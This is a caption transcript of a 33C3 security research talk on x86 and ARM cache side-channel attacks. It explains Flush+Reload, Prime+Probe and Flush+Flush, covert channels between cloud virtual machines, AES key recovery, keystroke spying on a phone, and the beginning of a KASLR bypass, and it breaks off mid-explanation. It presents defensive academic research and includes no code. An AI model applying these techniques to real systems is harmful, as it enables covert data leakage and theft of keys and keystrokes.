Return to Video

What could possibly go wrong with (insert x86 instruction here)? (33c3)

  • 0:00 - 0:13
    Music
  • 0:13 - 0:17
    Herald Angel: We are here with a motto,
    and the motto of this year is "Works For
  • 0:17 - 0:22
    Me" and I think, who many people, how many
    people in here are programmmers? Raise
  • 0:22 - 0:29
    your hands or shout or... Whoa, that's a
    lot. Okay. So I think many of you will
  • 0:29 - 0:39
    work on x86. Yeah. And I think you assume
    that it works, and that everything works
  • 0:39 - 0:48
    as intended And I mean: What could go
    wrong? Our next talk, the first one today,
  • 0:48 - 0:52
    will be by Clémentine Maurice, who
    previously was here with RowhammerJS,
  • 0:52 - 1:02
    something I would call scary, and Moritz
    Lipp, who has worked on the Armageddon
  • 1:02 - 1:10
    exploit, back, what is it? Okay, so the
    next... I would like to hear a really warm
  • 1:10 - 1:14
    applause for the speakers for the talk
    "What could what could possibly go wrong
  • 1:14 - 1:17
    with insert x86 instruction here?"
  • 1:17 - 1:18
    thank you.
  • 1:18 - 1:28
    Applause
  • 1:28 - 1:33
    Clémentine Maurice (CM): Well, thank you
    all for being here this morning. Yes, this
  • 1:33 - 1:38
    is our talk "What could possibly go wrong
    with insert x86 instructions here". So
  • 1:38 - 1:43
    just a few words about ourselves: So I'm
    Clémentine Maurice, I got my PhD last year
  • 1:43 - 1:47
    in computer science and I'm now working as
    a postdoc at Graz University of Technology
  • 1:47 - 1:52
    in Austria. You can reach me on Twitter or
    by email but there's also I think a lots
  • 1:52 - 1:57
    of time before the Congress is over.
    Moritz Lipp (ML): Hi and my name is Moritz
  • 1:57 - 2:02
    Lipp, I'm a PhD student at Graz University
    of Technology and you can also reach me on
  • 2:02 - 2:07
    Twitter or just after our talk and in the
    next days.
  • 2:07 - 2:11
    CM: So, about this talk: So, the title
    says this is a talk about x86
  • 2:11 - 2:18
    instructions, but this is not a talk about
    software. Don't leave yet! I'm actually
  • 2:18 - 2:22
    even assuming safe software and the point
    that we want to make is that safe software
  • 2:22 - 2:27
    does not mean safe execution and we have
    information leakage because of the
  • 2:27 - 2:33
    underlying hardware and this is what we're
    going to talk about today. So we'll be
  • 2:33 - 2:37
    talking about cache attacks, what are
    they, what can we do with that and also a
  • 2:37 - 2:42
    special kind of cache attack that we found
    this year. So... doing cache attacks
  • 2:42 - 2:49
    without memory accesses and how to use
    that even to bypass kernel ASLR.
  • 2:49 - 2:53
    So again, the talk says is to talk about
    x86 instructions but this is even more
  • 2:53 - 2:58
    global than that. We can also mount these
    cache attacks on ARM and not only on the
  • 2:58 - 3:07
    x86. So some of the examples that you will
    see also applies to ARM. So today we'll do
  • 3:07 - 3:11
    have a bit of background, but actually
    most of the background will be along the
  • 3:11 - 3:19
    lines because this covers really a huge
    chunk of our research, and we'll see
  • 3:19 - 3:24
    mainly three instructions: So "mov" and
    how we can perform these cache attacks,
  • 3:24 - 3:29
    what are they... The instruction
    "clflush", so here we'll be doing cache
  • 3:29 - 3:36
    attacks without any memory accesses. Then
    we'll see "prefetch" and how we can bypass
  • 3:36 - 3:43
    kernel ASLR and lots of translations
    levels, and then there's even a bonus
  • 3:43 - 3:49
    track, so it's this this will be not our
    works, but even more instructions and even
  • 3:49 - 3:54
    more text.
    Okay, so let's start with a bit of an
  • 3:54 - 4:01
    introduction. So we will be mainly
    focusing on Intel CPUs, and this is
  • 4:01 - 4:06
    roughly in terms of cores and caches, how
    it looks like today. So we have different
  • 4:06 - 4:09
    levels of cores ...uh... different cores
    so here four cores, and different levels
  • 4:09 - 4:14
    of caches. So here usually we have three
    levels of caches. We have level 1 and
  • 4:14 - 4:18
    level 2 that are private to each call,
    which means that core 0 can only access
  • 4:18 - 4:25
    its level 1 and its level 2 and not level
    1 and level 2 of, for example, core 3, and
  • 4:25 - 4:30
    we have the last level cache... so here if
    you can see the pointer... So this one is
  • 4:30 - 4:36
    divided in slices so we have as many
    slices as cores, so here 4 slices, but all
  • 4:36 - 4:41
    the slices are shared across core so core
    0 can access the whole last level cache,
  • 4:41 - 4:49
    that's 0 1 2 & 3. We also have a nice
    property on Intel CPUs is that this level
  • 4:49 - 4:52
    of cache is inclusive, and what it means
    is that everything that is contained in
  • 4:52 - 4:57
    level 1 and level 2 will also be contained
    in the last level cache, and this will
  • 4:57 - 5:01
    prove to be quite useful for cache
    attacks.
  • 5:01 - 5:08
    So today we mostly have set associative
    caches. What it means is that we have data
  • 5:08 - 5:13
    that is loaded in specific sets and that
    depends only on its address. So we have
  • 5:13 - 5:19
    some bits of the address that gives us the
    index and that says "Ok the line is going
  • 5:19 - 5:25
    to be loaded in this cache set", so this
    is a cache set. Then we have several ways
  • 5:25 - 5:31
    per set so here we have 4 ways and the
    cacheine is going to be loaded in a
  • 5:31 - 5:35
    specific way and that will only depend on
    the replacement policy and not on the
  • 5:35 - 5:41
    address itself, so when you load a line
    into the cache, usually the cache is
  • 5:41 - 5:45
    already full and you have to make room for
    a new line. So this is where the
  • 5:45 - 5:50
    replacement replacement policy—this is
    what it does—it says ok I'm going to
  • 5:50 - 5:58
    remove this line to make room for the next
    line. So for today we're going to see only
  • 5:58 - 6:02
    three instruction as I've been telling
    you. So the move instruction, it does a
  • 6:02 - 6:07
    lot of things but the only aspect that
    we're interested in about it that can
  • 6:07 - 6:13
    access data in the main memory.
    We're going to see a clflush what it does
  • 6:13 - 6:18
    is that it removes a cache line from the
    cache, from the whole cache. And we're
  • 6:18 - 6:26
    going to see prefetch, it prefetches a
    cache line for future use. So we're going
  • 6:26 - 6:31
    to see what they do and the kind of side
    effects that they have and all the attacks
  • 6:31 - 6:35
    that we can do with them. And that's
    basically all the example you need for
  • 6:35 - 6:40
    today so even if you're not an expert of
    x86 don't worry it's not just slides full
  • 6:40 - 6:45
    of assembly and stuff. Okay so on to the
    first one.
  • 6:45 - 6:50
    ML: So we will first start with the 'mov'
    instruction and actually the first slide
  • 6:50 - 6:58
    is full of code, however as you can see
    the mov instruction is used to move data
  • 6:58 - 7:03
    from registers to registers, from the main
    memory and back to the main memory and as
  • 7:03 - 7:07
    you can see there are many moves you can
    use but basically it's just to move data
  • 7:07 - 7:13
    and that's all we need to know. In
    addition, a lot of exceptions can occur so
  • 7:13 - 7:18
    we can assume that those restrictions are
    so tight that nothing can go wrong when
  • 7:18 - 7:22
    you just move data because moving data is
    simple.
  • 7:22 - 7:28
    However while there are a lot of
    exceptions the data that is accessed is
  • 7:28 - 7:35
    always loaded into the cache, so data is
    in the cache and this is transparent to
  • 7:35 - 7:41
    the program that is running. However,
    there are side-effects when you run these
  • 7:41 - 7:46
    instructions, and we will see how they
    look like with the mov instruction. So you
  • 7:46 - 7:51
    probably all know that data can either be
    in CPU registers, in the different levels
  • 7:51 - 7:56
    of the cache that Clementine showed to you
    earlier, in the main memory, or on the
  • 7:56 - 8:02
    disk, and depending on where the memory
    and the data is located it needs a longer
  • 8:02 - 8:10
    time to be loaded back to the CPU, and
    this is what we can see in this plot. So
  • 8:10 - 8:16
    we try here to measure the access time of
    an address over and over again, assuming
  • 8:16 - 8:22
    that when we access it more often, it is
    already stored in the cache. So around 70
  • 8:22 - 8:27
    cycles, most of the time we can assume
    when we load an address and it takes 70
  • 8:27 - 8:35
    cycles, it's loaded into the cache.
    However, when we assume that the data is
  • 8:35 - 8:40
    loaded from the main memory, we can
    clearly see that it needs a much longer
  • 8:40 - 8:47
    time like a bit more than 200 cycles. So
    depending when we measure the time it
  • 8:47 - 8:51
    takes to load the address we can say the
    data has been loaded to the cache or the
  • 8:51 - 8:58
    data is still located in the main memory.
    And this property is what we can exploit
  • 8:58 - 9:05
    using cache attacks. So we measure the
    timing differences on memory accesses. And
  • 9:05 - 9:10
    what an attacker does he monitors the
    cache lines, but he has no way to know
  • 9:10 - 9:14
    what's actually the content of the cache
    line. So we can only monitor that this
  • 9:14 - 9:20
    cache line has been accessed and not
    what's actually stored in the cache line.
  • 9:20 - 9:24
    And what you can do with this is you can
    implement covert channels, so you can
  • 9:24 - 9:30
    allow two processes to communicate with
    each other evading the permission system
  • 9:30 - 9:35
    what we will see later on. In addition you
    can also do side channel attacks, so you
  • 9:35 - 9:41
    can spy with a malicious attacking
    application on benign processes, and you
  • 9:41 - 9:46
    can use this to steal cryptographic keys
    or to spy on keystrokes.
  • 9:46 - 9:54
    And basically we have different types of
    cache attacks and I want to explain the
  • 9:54 - 9:59
    most popular one, the "Flush+Reload"
    attack, in the beginning. So on the left,
  • 9:59 - 10:03
    you have the address space of the victim,
    and on the right you have the address
  • 10:03 - 10:09
    space of the attacker who maps a shared
    library—an executable—that the victim is
  • 10:09 - 10:15
    using in to its own address space, like
    the red rectangle. And this means that
  • 10:15 - 10:23
    when this data is stored in the cache,
    it's cached for both processes. Now the
  • 10:23 - 10:28
    attacker can use the flush instruction to
    remove the data out of the cache, so it's
  • 10:28 - 10:34
    not in the cache anymore, so it's also not
    cached for the victim. Now the attacker
  • 10:34 - 10:39
    can schedule the victim and if the victim
    decides "yeah, I need this data", it will
  • 10:39 - 10:45
    be loaded back into the cache. And now the
    attacker can reload the data, measure the
  • 10:45 - 10:50
    time how long it took, and then decide
    "okay, the victim has accessed the data in
  • 10:50 - 10:54
    the meantime" or "the victim has not
    accessed the data in the meantime." And by
  • 10:54 - 10:59
    that you can spy if this address has been
    used.
  • 10:59 - 11:03
    The second type of attack is called
    "Prime+Probe" and it does not rely on the
  • 11:03 - 11:09
    shared memory like the "Flush+Reload"
    attack, and it works as following: Instead
  • 11:09 - 11:16
    of mapping anything into its own address
    space, the attacker loads a lot of data
  • 11:16 - 11:25
    into one cache line, here, and fills the
    cache. Now he again schedules the victim
  • 11:25 - 11:32
    and the schedule can access data that maps
    to the same cache set.
  • 11:32 - 11:38
    So the cache set is used by the attacker
    and the victim at the same time. Now the
  • 11:38 - 11:43
    attacker can start measuring the access
    time to the addresses he loaded into the
  • 11:43 - 11:49
    cache before, and when he accesses an
    address that is still in the cache it's
  • 11:49 - 11:56
    faster so he measures the lower time. And
    if it's not in the cache anymore it has to
  • 11:56 - 12:01
    be reloaded into the cache so it takes a
    longer time. He can sum this up and detect
  • 12:01 - 12:08
    if the victim has loaded data into the
    cache as well. So the first thing we want
  • 12:08 - 12:12
    to show you is what you can do with cache
    attacks is you can implement a covert
  • 12:12 - 12:17
    channel and this could be happening in the
    following scenario.
  • 12:17 - 12:24
    You install an app on your phone to view
    your favorite images you take, to apply
  • 12:24 - 12:29
    some filters, and in the end you don't
    know that it's malicious because the only
  • 12:29 - 12:34
    permission it requires is to access your
    images which makes sense. So you can
  • 12:34 - 12:39
    easily install it without any fear. In
    addition you want to know what the weather
  • 12:39 - 12:43
    is outside, so you install a nice little
    weather widget, and the only permission it
  • 12:43 - 12:48
    has is to access the internet because it
    has to load the information from
  • 12:48 - 12:56
    somewhere. So what happens if you're able
    to implement a covert channel between two
  • 12:56 - 13:00
    these two applications, without any
    permissions and privileges so they can
  • 13:00 - 13:05
    communicate with each other without using
    any mechanisms provided by the operating
  • 13:05 - 13:11
    system, so it's hidden. It can happen that
    now the gallery app can send the image to
  • 13:11 - 13:19
    the internet, it will be uploaded and
    exposed for everyone. So maybe you don't
  • 13:19 - 13:26
    want to see the cat picture everywhere.
    While we can do this with those
  • 13:26 - 13:30
    Prime+Probe/ Flush+Reload attacks, we will
    discuss a covert channel using
  • 13:30 - 13:36
    Prime+Probe. So how can we transmit this
    data? We need to transmit ones and zeros
  • 13:36 - 13:41
    at some point. So the sender and the
    receiver agree on one cache set that they
  • 13:41 - 13:49
    both use. The receiver probes the set all
    the time. When the sender wants to
  • 13:49 - 13:58
    transmit a zero he just does nothing, so
    the lines of the receiver are in the cache
  • 13:58 - 14:02
    all the time, and he knows "okay, he's
    sending nothing", so it's a zero.
  • 14:02 - 14:06
    On the other hand if the sender wants to
    transmit a one, he starts accessing
  • 14:06 - 14:11
    addresses that map to the same cache set
    so it will take a longer time for the
  • 14:11 - 14:17
    receiver to access its addresses again,
    and he knows "okay, the sender just sent
  • 14:17 - 14:23
    me a one", and Clementine will show you
    what you can do with this covert channel.
  • 14:23 - 14:25
    CM: So the really nice thing about
  • 14:25 - 14:29
    Prime+Probe is that it has really low
    requirements. It doesn't need any kind of
  • 14:29 - 14:34
    shared memory. For example if you have two
    virtual machines you could have some
  • 14:34 - 14:39
    shared memory via memory deduplication.
    The thing is that this is highly insecure,
  • 14:39 - 14:44
    so cloud providers like Amazon ec2, they
    disable that. Now we can still use
  • 14:44 - 14:50
    Prime+Probe because it doesn't need this
    shared memory. Another problem with cache
  • 14:50 - 14:55
    covert channels is that they are quite
    noisy. So when you have other applications
  • 14:55 - 14:59
    that are also running on the system, they
    are all competing for the cache and they
  • 14:59 - 15:03
    might, like, evict some cache lines,
    especially if it's an application that is
  • 15:03 - 15:09
    very memory intensive. And you also have
    noise due to the fact that the sender and
  • 15:09 - 15:13
    the receiver might not be scheduled at the
    same time. So if you have your sender that
  • 15:13 - 15:17
    sends all the things and the receiver is
    not scheduled then some part of the
  • 15:17 - 15:23
    transmission can get lost. So what we did
    is we tried to build an error-free covert
  • 15:23 - 15:31
    channel. We took care of all these noise
    issues by using some error detection to
  • 15:31 - 15:36
    resynchronize the sender and the receiver
    and then we use some error correction to
  • 15:36 - 15:41
    correct the remaining errors.
    So we managed to have a completely error-
  • 15:41 - 15:46
    free covert channel even if you have a lot
    of noise, so let's say another virtual
  • 15:46 - 15:54
    machine also on the machine serving files
    through a web server, also doing lots of
  • 15:54 - 16:02
    memory-intensive tasks at the same time,
    and the covert channel stayed completely
  • 16:02 - 16:08
    error-free, and around 40 to 75 kilobytes
    per second, which is still quite a lot.
  • 16:08 - 16:14
    All of this is between virtual machines on
    Amazon ec2. And the really neat thing—we
  • 16:14 - 16:19
    wanted to do something with that—and
    basically we managed to create an SSH
  • 16:19 - 16:27
    connection really over the cache. So they
    don't have any network between
  • 16:27 - 16:31
    them, but just we are sending the zeros
    and the ones and we have an SSH connection
  • 16:31 - 16:37
    between them. So you could say that cache
    covert channels are nothing, but I think
  • 16:37 - 16:43
    it's a real threat. And if you want to
    have more details about this work in
  • 16:43 - 16:49
    particular, it will be published soon at
    NDSS.
  • 16:49 - 16:54
    So the second application that we wanted
    to show you is that we can attack crypto
  • 16:54 - 17:01
    with cache attacks. In particular we are
    going to show an attack on AES and a
  • 17:01 - 17:05
    special implementation of AES that uses
    T-Tables. so that's the fast software
  • 17:05 - 17:12
    implementation because it uses some
    precomputed lookup tables. It's known to
  • 17:12 - 17:17
    be vulnerable to side-channel attacks
    since 2006 by Osvik et al, and it's a one-
  • 17:17 - 17:24
    round known plaintext attack, so you have
    p—or plaintext—and k, your secret key. And
  • 17:24 - 17:30
    the AES algorithm, what it does is compute
    an intermediate state at each round r.
  • 17:30 - 17:39
    And in the first round, the accessed table
    indices are just p XOR k. Now it's a known
  • 17:39 - 17:44
    plaintext attack, what this means is that
    if you can recover the accessed table
  • 17:44 - 17:49
    indices you've also managed to recover the
    key because it's just XOR. So that would
  • 17:49 - 17:55
    be bad, right, if we could recover these
    accessed table indices. Well we can, with
  • 17:55 - 18:01
    cache attacks! So we did that with
    Flush+Reload and with Prime+Probe. On the
  • 18:01 - 18:06
    x-axis you have the plaintext byte values
    and on the y-axis you have the addresses
  • 18:06 - 18:16
    which are essentially the T table entries.
    So a black cell means that we've monitored
  • 18:16 - 18:20
    the cache line, and we've seen a lot of
    cache hits. So basically the blacker it
  • 18:20 - 18:26
    is, the more certain we are that the
    T-Table entry has been accessed. And here
  • 18:26 - 18:32
    it's a toy example, the key is all-zeros,
    but you would basically just have a
  • 18:32 - 18:36
    different pattern if the key was not all-
    zeros, and as long as you can see this
  • 18:36 - 18:43
    nice diagonal or a pattern then you have
    recovered the key. So it's an old attack,
  • 18:43 - 18:49
    2006, it's been 10 years, everything
    should be fixed by now, and you see where
  • 18:49 - 18:57
    I'm going: it's not. So on Android the
    bouncy castle implementation it uses by
  • 18:57 - 19:03
    default the T-table, so that's bad. Also
    many implementations that you can find
  • 19:03 - 19:11
    online uses pre-computed values, so maybe
    be wary about this kind of attacks. The
  • 19:11 - 19:17
    last application we wanted to show you is
    how we can spy on keystrokes.
  • 19:17 - 19:21
    So for that we will use flush and reload
    because it's a really fine grained
  • 19:21 - 19:26
    attack. We can see very precisely which
    cache line has been accessed, and a cache
  • 19:26 - 19:31
    line is only 64 bytes so it's really not a
    lot and we're going to use that to spy on
  • 19:31 - 19:38
    keystrokes and we even have a small demo
    for you.
  • 19:40 - 19:46
    ML: So what you can see on the screen this
    is not on Intel x86 it's on a smartphone,
  • 19:46 - 19:50
    on the Galaxy S6, but you can also apply
    these cache attacks there so that's what
  • 19:50 - 19:54
    we want to emphasize.
    So on the left you see the screen and on
  • 19:54 - 19:58
    the right we have connected a shell with
    no privileges and permissions, so it can
  • 19:58 - 20:01
    basically be an app that you install
    glass bottle falling
  • 20:01 - 20:09
    from the App Store and on the right we are
    going to start our spy tool, and on the
  • 20:09 - 20:14
    left we just open the messenger app and
    whenever the user hits any key on the
  • 20:14 - 20:20
    keyboard our spy tool takes care of that
    and notices that. Also if he presses the
  • 20:20 - 20:26
    spacebar we can also measure that. If the
    user decides "ok, I want to delete the
  • 20:26 - 20:31
    word" because he changed his mind, we can
    also register if the user pressed the
  • 20:31 - 20:38
    backspace button, so in the end we can see
    exactly how long the words were, the user
  • 20:38 - 20:46
    typed into his phone without any
    permissions and privileges, which is bad.
  • 20:46 - 20:55
    laughs
    applause
  • 20:55 - 21:00
    ML: so enough about the mov instruction,
    let's head to clflush.
  • 21:00 - 21:07
    CM: So the clflush instruction: What it
    does is that it invalidates from every
  • 21:07 - 21:12
    level the cache line that contains the
    address that you pass to this instruction.
  • 21:12 - 21:17
    So in itself it's kind of bad because it
    enables the Flush+Reload attacks that we
  • 21:17 - 21:21
    showed earlier, that was just flush,
    reload, and the flush part is done with
  • 21:21 - 21:29
    clflush. But there's actually more to it,
    how wonderful. So there's a first timing
  • 21:29 - 21:33
    leakage with it, so we're going to see
    that the clflush instruction has a
  • 21:33 - 21:38
    different timing depending on whether the
    data that you that you pass to it is
  • 21:38 - 21:45
    cached or not. So imagine you have a cache
    line that is on the level 1 by inclu...
  • 21:45 - 21:50
    With the inclusion property it has to be
    also in the last level cache. Now this is
  • 21:50 - 21:54
    quite convenient and this is also why we
    have this inclusion property for
  • 21:54 - 22:00
    performance reason on Intel CPUs, if you
    want to see if a line is present at all in
  • 22:00 - 22:04
    the cache you just have to look in the
    last level cache. So this is basically
  • 22:04 - 22:08
    what the clflush instruction does. It goes
    to the last last level cache, sees "ok
  • 22:08 - 22:13
    there's a line, I'm going to flush this
    one" and then there's something that tells
  • 22:13 - 22:19
    ok the line is also present somewhere else
    so then it flushes the line in level 1
  • 22:19 - 22:26
    and/or level 2. So that's slow. Now if you
    perform clflush on some data that is not
  • 22:26 - 22:32
    cached, basically it does the same, goes
    to the last level cache, see that there's
  • 22:32 - 22:37
    no line and there can't be any... This
    data can't be anywhere else in the cache
  • 22:37 - 22:41
    because it would be in the last level
    cache if it was anywhere, so it does
  • 22:41 - 22:47
    nothing and it stop there. So that's fast.
    So how exactly fast and slow am I talking
  • 22:47 - 22:54
    about? So it's actually only a very few
    cycles so we did this experiments on
  • 22:54 - 22:59
    different microarchitecture so Center
    Bridge, Ivy Bridge, and Haswell and...
  • 22:59 - 23:03
    So it different colors correspond to the
    different microarchitecture. So first
  • 23:03 - 23:08
    thing that is already... kinda funny is
    that you can see that you can distinguish
  • 23:08 - 23:15
    the micro architecture quite nicely with
    this, but the real point is that you have
  • 23:15 - 23:20
    really a different zones. The solids...
    The solid line is when we performed the
  • 23:20 - 23:25
    measurement on clflush with the line that
    was already in the cache, and the dashed
  • 23:25 - 23:31
    line is when the line was not in the
    cache, and in all microarchitectures you
  • 23:31 - 23:37
    can see that we can see a difference: It's
    only a few cycles, it's a bit noisy, so
  • 23:37 - 23:43
    what could go wrong? Okay, so exploiting
    these few cycles, we still managed to
  • 23:43 - 23:47
    perform a new cache attacks that we call
    "Flush+Flush", so I'm going to explain
  • 23:47 - 23:52
    that to you: So basically everything that
    we could do with "Flush+Reload", we can
  • 23:52 - 23:57
    also do with "Flush+Flush". We can perform
    cover channels and sidechannel attacks.
  • 23:57 - 24:01
    It's stealthier than previous cache
    attacks, I'm going to go back on this one,
  • 24:01 - 24:07
    and it's also faster than previous cache
    attacks. So how does it work exactly? So
  • 24:07 - 24:12
    the principle is a bit similar to
    "Flush+Reload": So we have the attacker
  • 24:12 - 24:16
    and the victim that have some kind of
    shared memory, let's say a shared library.
  • 24:16 - 24:21
    It will be shared in the cache The
    attacker will start by flushing the cache
  • 24:21 - 24:27
    line then let's the victim perform
    whatever it does, let's say encryption,
  • 24:27 - 24:32
    the victim will load some data into the
    cache, automatically, and now the attacker
  • 24:32 - 24:37
    wants to know again if the victim accessed
    this precise cache line and instead of
  • 24:37 - 24:44
    reloading it is going to flush it again.
    And since we have this timing difference
  • 24:44 - 24:47
    depending on whether the data is in the
    cache or not, it gives us the same
  • 24:47 - 24:55
    information as if we reloaded it, except
    it's way faster. So I talked about
  • 24:55 - 25:00
    stealthiness. So the thing is that
    basically these cache attacks and that
  • 25:00 - 25:06
    also applies to "Rowhammer": They are
    already stealth in themselves, because
  • 25:06 - 25:10
    there's no antivirus today that can detect
    them. but some people thought that we
  • 25:10 - 25:14
    could detect them with performance
    counters because they do a lot of cache
  • 25:14 - 25:19
    misses and cache references that happen
    when the data is flushed and when you
  • 25:19 - 25:26
    reaccess memory. now what we thought is
    that yeah but that also not the only
  • 25:26 - 25:31
    program steps to lots of cache misses and
    cache references so we would like to have
  • 25:31 - 25:38
    a slightly parametric. So these cache
    attacks they have a very heavy activity on
  • 25:38 - 25:44
    the cache but they're also very particular
    because there are very short loops of code
  • 25:44 - 25:49
    if you take flush and reload this just
    flush one line reload the line and then
  • 25:49 - 25:54
    again flush reload that's very short loop
    and that creates a very low pressure on
  • 25:54 - 26:01
    the instruction therapy which is kind of
    particular for of cache attacks so what we
  • 26:01 - 26:05
    decided to do is normalizing the cache
    even so the cache misses and cache
  • 26:05 - 26:11
    references by events that have to do with
    the instruction TLB and there we could
  • 26:11 - 26:19
    manage to detect cache attacks and
    Rowhammer without having false positives
  • 26:19 - 26:25
    so the system metric that I'm going to use
    when I talk about stealthiness so we
  • 26:25 - 26:30
    started by creating a cover channel. First
    we wanted to have it as fast as possible
  • 26:30 - 26:36
    so we created a protocol to evaluates all
    the kind of cache attack that we had so
  • 26:36 - 26:41
    flush+flush, flush+reload, and
    prime+probe and we started with a
  • 26:41 - 26:47
    packet side of 28 doesn't really matter.
    We measured the capacity of our covert
  • 26:47 - 26:53
    channel and flush+flush is around
    500 kB/s whereas Flush+Reload
  • 26:53 - 26:56
    was only 300 kB/s
    so Flush+Flush is already quite an
  • 26:56 - 27:01
    improvement on the speed.
    Then we measured the stealth zone at this
  • 27:01 - 27:06
    speed only Flush+Flush was stealth and
    now the thing is that Flush+Flush and
  • 27:06 - 27:10
    Flush+Reload as you've seen there are
    some similarities so for a covert channel
  • 27:10 - 27:15
    they also share the same center on it is
    receivers different and for this one the
  • 27:15 - 27:20
    center was not stealth for both of them
    anyway if you want a fast covert channel
  • 27:20 - 27:27
    then just try flush+flush that works.
    Now let's try to make it stealthy
  • 27:27 - 27:31
    completely stealthy because if I have the
    standard that is not stealth maybe that we
  • 27:31 - 27:36
    give away the whole attack so we said okay
    maybe if we just slow down all the attacks
  • 27:36 - 27:41
    then there will be less cache hits,
    cache misses and then maybe all
  • 27:41 - 27:48
    the attacks are actually stealthy why not?
    So we tried that we slowed down everything
  • 27:48 - 27:53
    so Flush+Reload and Flash+Flash
    are around 50 kB/s now
  • 27:53 - 27:56
    Prime+Probe is a bit slower because it
    takes more time
  • 27:56 - 28:01
    to prime and probe anything but still
  • 28:01 - 28:09
    even with this slow down only Flush+Flush
    has its receiver stealth and we also
  • 28:09 - 28:15
    managed to have the sender stealth now so
    basically whether you want a fast covert
  • 28:15 - 28:20
    channel or a stealth covert channel
    Flush+Flush is really great.
  • 28:20 - 28:26
    Now we wanted to also evaluate if it
    wasn't too noisy to perform some side
  • 28:26 - 28:31
    channel attack so we did these side
    channels on the AES t-table implementation
  • 28:31 - 28:36
    the attacks that we have shown you
    earlier, so we computed a lot of
  • 28:36 - 28:42
    encryption that we needed to determine the
    upper four bits of a key bytes so here the
  • 28:42 - 28:49
    lower the better the attack and Flush +
    Reload is a bit better so we need only 250
  • 28:49 - 28:55
    encryptions to recover these bits but
    Flush+Flush comes quite, comes quite
  • 28:55 - 29:01
    close with 350 and Prime+Probe is
    actually the most noisy of them all, needs
  • 29:01 - 29:06
    5... close to 5000 encryptions so we have
    around the same performance for
  • 29:06 - 29:14
    Flush+Flush and Flush+Reload.
    Now let's evaluate the stealthiness again.
  • 29:14 - 29:19
    So what we did here is we perform 256
    billion encryptions in a synchronous
  • 29:19 - 29:26
    attack so we really had the spy and the
    victim scattered and we evaluated the
  • 29:26 - 29:31
    stealthiness of them all and here only
    Flush+Flush again is stealth. And while
  • 29:31 - 29:36
    you can always slow down a covert channel
    you can't actually slow down a side
  • 29:36 - 29:41
    channel because, in a real-life scenario,
    you're not going to say "Hey victim, him
  • 29:41 - 29:47
    wait for me a bit, I am trying to do an
    attack here." That won't work.
  • 29:47 - 29:51
    So there's even more to it but I will need
    again a bit of background before
  • 29:51 - 29:57
    continuing. So I've shown you the
    different levels of caches and here I'm
  • 29:57 - 30:04
    going to focus more on the last-level
    cache. So we have here our four slices so
  • 30:04 - 30:10
    this is the last-level cache and we have
    some bits of the address here that
  • 30:10 - 30:14
    corresponds to the set, but more
    importantly, we need to know where in
  • 30:14 - 30:20
    which slice and address is going to be.
    And that is given, that is given by some
  • 30:20 - 30:24
    bits of the set and the type of the
    address that are passed into a function
  • 30:24 - 30:28
    that says in which slice the line is going
    to be.
  • 30:28 - 30:32
    Now the thing is that this hash function
    is undocumented by Intel. Wouldn't be fun
  • 30:32 - 30:39
    otherwise. So we have this: As many slices
    as core, an undocumented hash function
  • 30:39 - 30:44
    that maps a physical address to a slice,
    and while it's actually a bit of a pain
  • 30:44 - 30:49
    for attacks, it has, it was not designed
    for security originally but for
  • 30:49 - 30:54
    performance, because you want all the
    access to be evenly distributed in the
  • 30:54 - 31:00
    different slices, for performance reasons.
    So the hash function basically does, it
  • 31:00 - 31:05
    takes some bits of the physical address
    and output k bits of slice, so just one
  • 31:05 - 31:09
    bits if you have a two-core machine, two
    bits if you have a four-core machine and
  • 31:09 - 31:17
    so on. Now let's go back to clflush, see
    what's the relation with that.
  • 31:17 - 31:21
    So the thing that we noticed is that
    clflush is actually faster to reach a line
  • 31:21 - 31:29
    on the local slice.
    So if you have, if you're flushing always
  • 31:29 - 31:33
    one line and you run your program on core
    zero, core one, core two and core three,
  • 31:33 - 31:38
    you will observe that one core in
    particular on, when you run the program on
  • 31:38 - 31:45
    one core, the clflush is faster. And so
    here this is on core one, and you can see
  • 31:45 - 31:51
    that core zero, two, and three it's, it's
    a bit slower and here we can deduce that,
  • 31:51 - 31:55
    so we run the program on core one and we
    flush always the same line and we can
  • 31:55 - 32:02
    deduce that the line belong to slice one.
    And what we can do with that is that we
  • 32:02 - 32:06
    can map physical address to slices.
    And that's one way to reverse-engineer
  • 32:06 - 32:11
    this addressing function that was not
    documented.
  • 32:11 - 32:16
    Funnily enough that's not the only way:
    What I did before that was using the
  • 32:16 - 32:21
    performance counters to reverse-engineer
    this function, but that's actually a whole
  • 32:21 - 32:28
    other story and if you want more detail on
    that, there's also an article on that.
  • 32:28 - 32:30
    ML: So the next instruction we want to
  • 32:30 - 32:35
    talk about is the prefetch instruction.
    And the prefetch instruction is used to
  • 32:35 - 32:41
    tell the CPU: "Okay, please load the data
    I need later on, into the cache, if you
  • 32:41 - 32:46
    have some time." And in the end there are
    actually six different prefetch
  • 32:46 - 32:53
    instructions: prefetcht0 to t2 which
    means: "CPU, please load the data into the
  • 32:53 - 32:59
    first-level cache", or in the last-level
    cache, whatever you want to use, but we
  • 32:59 - 33:02
    spare you the details because it's not so
    interesting in the end.
  • 33:02 - 33:07
    However, what's more interesting is when
    we take a look at the Intel manual and
  • 33:07 - 33:12
    what it says there. So, "Using the
    PREFETCH instruction is recommended only
  • 33:12 - 33:17
    if data does not fit in the cache." So you
    can tell the CPU: "Please load data I want
  • 33:17 - 33:23
    to stream into the cache, so it's more
    performant." "Use of software prefetch
  • 33:23 - 33:28
    should be limited to memory addresses that
    are managed or owned within the
  • 33:28 - 33:34
    application context."
    So one might wonder what happens if this
  • 33:34 - 33:41
    address is not managed by myself. Sounds
    interesting. "Prefetching to addresses
  • 33:41 - 33:46
    that are not mapped to physical pages can
    experience non-deterministic performance
  • 33:46 - 33:52
    penalty. For example specifying a NULL
    pointer as an address for prefetch can
  • 33:52 - 33:56
    cause long delays."
    So we don't want to do that because our
  • 33:56 - 34:03
    program will be slow. So, let's take a
    look what they mean with non-deterministic
  • 34:03 - 34:09
    performance penalty, because we want to
    write good software, right? But before
  • 34:09 - 34:13
    that, we have to take a look at a little
    bit more background information to
  • 34:13 - 34:18
    understand the attacks.
    So on modern operating systems, every
  • 34:18 - 34:23
    application has its own virtual address
    space. So at some point, the CPU needs to
  • 34:23 - 34:27
    translate these addresses to the physical
    addresses actually in the DRAM. And for
  • 34:27 - 34:34
    that we have this very complex-looking
    data structure. So we have a 48-bit
  • 34:34 - 34:40
    virtual address, and some of those bits
    mapped to a table, like the PM level 4
  • 34:40 - 34:48
    table, with 512 entries, so depending on
    those bits the CPU knows, at which line he
  • 34:48 - 34:52
    has to look.
    And if there is data there, because the
  • 34:52 - 34:57
    address is mapped, he can proceed and look
    at the page directory, point the table,
  • 34:57 - 35:05
    and so on for the town. So is everything,
    is the same for each level until you come
